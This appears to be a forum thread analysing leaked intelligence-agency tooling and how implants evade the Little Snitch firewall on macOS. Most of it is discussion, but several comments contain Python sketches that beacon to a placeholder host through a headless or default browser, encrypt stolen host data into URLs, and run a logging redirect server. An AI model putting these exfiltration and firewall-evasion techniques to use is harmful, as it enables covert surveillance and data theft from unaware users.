What's stranger is that they feel the need to open a "hidden" browser instance to connect to the internet. A browser isn't really a necessary part of establishing a connection -- unless there's some missing context here. Is my grandmother running the CIA data ops division?
Edit: it's been made clear to me that of course this is one of the few viable vectors when dealing with a really restrictive outbound firewall (like Little Snitch). If a browser is already approved to make a given connection, then using a headless instance to do the network talking is a smart way to do it. If you roll your own net code, a tool like LS will notify the user and/or block it. Dumb me!
Exactly. Firewalls like Little Snitch filter traffic primarily based on the binary initiating the connection, and only secondarily based on the target port or address. When Little Snitch pops up for the 10th time in 30 seconds, you'll just approve all traffic from your browser, so using the browser to send all traffic is a great way to avoid being caught.
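A minimal sketch of what that could look like in practice (the browser path, flags, and URL here are illustrative assumptions on my part, not anything from the leak): instead of opening its own socket, the implant hands the request to a browser binary the user has already whitelisted, run headlessly so no window appears.

    import subprocess

    # Sketch only: drive an already-approved browser binary instead of opening
    # our own socket, so a per-application firewall attributes the traffic to
    # the browser. Path, flags, and URL are assumptions for illustration.
    CHROME = "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"
    URL = "https://updates.example.com/checkin?id=abc123"  # hypothetical endpoint

    # --headless keeps any window from appearing; --dump-dom just gives the
    # process something to do with the response before it exits.
    subprocess.run([CHROME, "--headless", "--disable-gpu", "--dump-dom", URL],
                   capture_output=True, timeout=30)

From Little Snitch's point of view the connection comes from the browser binary, which most users have already granted blanket rules for.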
As for what "injecting into Little Snitch" means, it could mean either injecting code into Little Snitch itself (since Little Snitch probably doesn't filter its own traffic), or injecting a rule into Little Snitch.
Little Snitch does filter itself, but the Allow rules are there by default. I remember that on a previous version, one of the steps to pirate LS was adding a rule to block it from connecting to its servers.
Casually browsing the archive, I saw something related to injecting payloads into OSX applications. The application that did this required the latest version of Xcode to compile, according to the installation and build docs.
I mean they could just write some net code that sends packets to whatever port, but launching IE and doing everything over HTTPS or whatever is much more stealthy when it comes to network monitoring and system logs.
But why not spend ten minutes making their net code use SSL, and avoid the browser altogether?
I guess one could argue that adding SSL client behavior to a sneaky hidden tracker would bloat its footprint and make it more identifiable. But SSL libraries are typically linkable on the host system anyway, so no compilation beyond the headers is needed.
It's just a weird "workaround" on their part if that's the intention.
Perhaps bots are more easily distinguished from a human user who's using a real browser. If the goal is to be stealthy, then they'd want to appear as human-like as possible.
Windows has very sophisticated firewalling and network access can be filtered on a per-process, per-network basis.
Restrictive companies will only allow pre-approved applications on specific ports, like IE doing HTTP/S over ports 80 and 443, and only on approved/trusted networks.
Correct. It is likely users allow their primary browser full access to all hosts on ports 80 and 443, if not all ports.
Additionally, launching the browser gives you easy access to all the tasty session cookies, and access to their keychain (I assume a lot of people give their default browser on OSX keychain access).
I would guess that the hidden browser could have access to data (login cookies, browser history, and combined with another vulnerability maybe even anything the user enters in other browser windows) that a separate program would not have access to.
Lol good point. I meant to imply the history that the ISP would see, not the local one. Although a hidden browser wouldn't be necessary for that anyway. Never mind :)
Little Snitch will warn you (ask permission) if a new process wants to connect to the internet. If the beacon can pass information through a browser process, though, I expect most people have Little Snitch rules that allow their browser to send any traffic without warnings.
1. Only a tiny minority of macOS users use Little Snitch, and they're not necessarily the most sensitive/interesting targets.
2. If you're competent and you have enough privileges to inject a DLL into anything, the odds are overwhelming that you also own the kernel. Why would you waste time with a goofy firewall add-on package?
I joked on Twitter but I'm "ha ha only serious" about this: if you had this entire portfolio of tools and exploits 2 years ago, I'm not sure you could have gotten a job at Immunity. The leak is fascinating. The technical details: not so much.
I thought the Shadow Brokers/Equation Group dump demonstrated a not-especially-skillful group of inexperienced-seeming pentesters who happened to have acquired some interesting bugs on the black market. Today's dump shows a team that's way less impressive even than that.
Little Snitch users are the kind of people who can and would expose CIA beacon signals. It's not so much that LS users are juicy targets, but rather that they are substantial exposure risks.
You might say, well, just piggy-back the signal on something else. Indeed, that is better. But that solution is far more complicated because you have to control (cooperatively, or coercively) a legitimate end-point.
Ergo, I don't think it's clownish at all for the CIA to target LS; it addresses a real threat (to them).
That's not what he was saying. Yes, it would of course be a good idea to try to hide the malware implants from tools like Little Snitch. It's just that the method they propose of going about it is really dumb.
What tptacek is saying is that instead of writing some hand-tailored userspace code to specifically fool Little Snitch, they should just be using a kernel module that will hide the network and process activity from all analysis tools. That's what most nation-state malware does (or tries to do).
Using kernel implants to hide signals from these kinds of network security tools is literally 1990s-grade hacker opsec. It's the actual, precise use case for which "amodload" was written, in 1996, by a 20-year-old, for a closed-source OS. I stand by my assessment.
...But what if you can't implant into the kernel? Also, what if you don't want to use a full-featured zero-day kernel exploit if you can get your target with a somewhat lower-tech exploit?
Clever to just recover all your data using a browser process which has (likely) already been fully authorized to exfiltrate data.
So, rather than targeting LS they would target the kernel with a patch to make LS (and all tools like it) blind to their traffic.
Clearly that's a neater and more complete approach, but there still might be reasons to target a specific app instead of the kernel. It might just be easier and less error prone. (Monkey-patching a running kernel's networking innards has got to pose serious risk to the underlying system's stability, increasing the likelihood that the target will simply reinstall the OS. That's fine for a DoS attack, but not for something like this).
I don't swim in these circles so forgive my ignorance -- What is significant about Immunity? Are you saying these exploits are trivial and/or old news?
The whole wiki that this leak released is full of the most basic configuration options for vim/VS etc. They have version control tutorials. They can't be hiring pros.
I'm just a little weirded out by how this list is, in style, identical to many of the lists I've created and have open right now. I need this to be a bit more "henchmanny" and a bit less "average Joe/Jane sitting at their desk under the fluorescent lights drinking coffee and idly thinking about the workweek ahead."
This actually made me burst out laughing and conveyed my thoughts exactly. It's like when you become old enough to realize your parents are fallible and have been winging it the whole time.
It's possible I've misunderstood, but I don't think they're trying to inject Little Snitch. I think they're trying to inject into Little Snitch, in order to evade its restrictions.
Little Snitch is a host-based application firewall for Mac OS X. It can be used to monitor applications, preventing or permitting them to connect to attached networks through advanced rules.
If you only need to send data once per week, and that data is less than 2K, simply encrypt it, make it part of a URL that you control, then tell the default browser to open that URL. Nearly everybody has configured Little Snitch so that the browser can connect to anything (because the popups quickly annoy). Then do a redirect on your server to something innocuous, and the user will quickly forget.
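Roughly what that flow could look like, sketched with hypothetical names (the endpoint, key handling, and the choice of Fernet for the encryption are my assumptions, not anything from the leak):

    import webbrowser
    from cryptography.fernet import Fernet  # pip install cryptography

    # Sketch of the scheme described above: encrypt a small payload, pack it
    # into a URL on a server you control, and let the default browser fetch it.
    KEY = Fernet.generate_key()              # in practice this would be pre-shared
    payload = b"hostname=alice-mbp;uid=501"  # well under the ~2K budget

    token = Fernet(KEY).encrypt(payload).decode()         # URL-safe base64 output
    url = "https://updates.example.com/check?v=" + token  # hypothetical endpoint

    webbrowser.open(url)  # opens the default browser, which LS already trusts

webbrowser.open() just asks the OS to open the URL in the default browser, so nothing here ever touches the network from the implant's own process.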
Or, even better, use window.close(); then the user will only see the browser window open briefly. Of course, if the user has JavaScript disabled, use an HTTP 302 Found or an HTML meta refresh to redirect, blah blah.
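The server side of that redirect dance could be as simple as something like this (a hypothetical sketch using only the Python standard library): log whatever arrived in the query string, then send the browser somewhere innocuous with a plain 302 so it works even with JavaScript disabled.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    class RedirectHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            # Record the incoming path (which carries the encrypted token).
            with open("beacons.log", "a") as f:
                f.write(self.path + "\n")
            # Bounce the browser to an innocuous page with a plain 302 Found.
            self.send_response(302)
            self.send_header("Location", "https://www.apple.com/")
            self.end_headers()

        def log_message(self, *args):
            pass  # keep the console quiet

    if __name__ == "__main__":
        HTTPServer(("", 8080), RedirectHandler).serve_forever()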
So, apart from not demonstrating very high skill level (already discussed in other comments written by people that seem knowledgeable), how is this even remotely morally shady? They clearly discuss penetrating particular target systems — isn't that exactly what you would expect your intelligence/counter-intelligence service to do?
I'd wager LS users are more tech-savvy and less likely to be using more mainstream tools like Norton or McAfee - they want one tool that gives them control over what programs have network access, not a bloated adware platform.
Their goal is to suborn and evade it. In context, "inject into" should be understood to mean "to inject code or configuration of choice into a software package".
This is a pretty interesting fly-by attack. Insinuation, not evidence based. Asking questions and having a conversation is why the rest of us are here. What is your goal by attacking the credibility of other people in the conversation?
EDIT: 128 days old, no prior comments or submissions.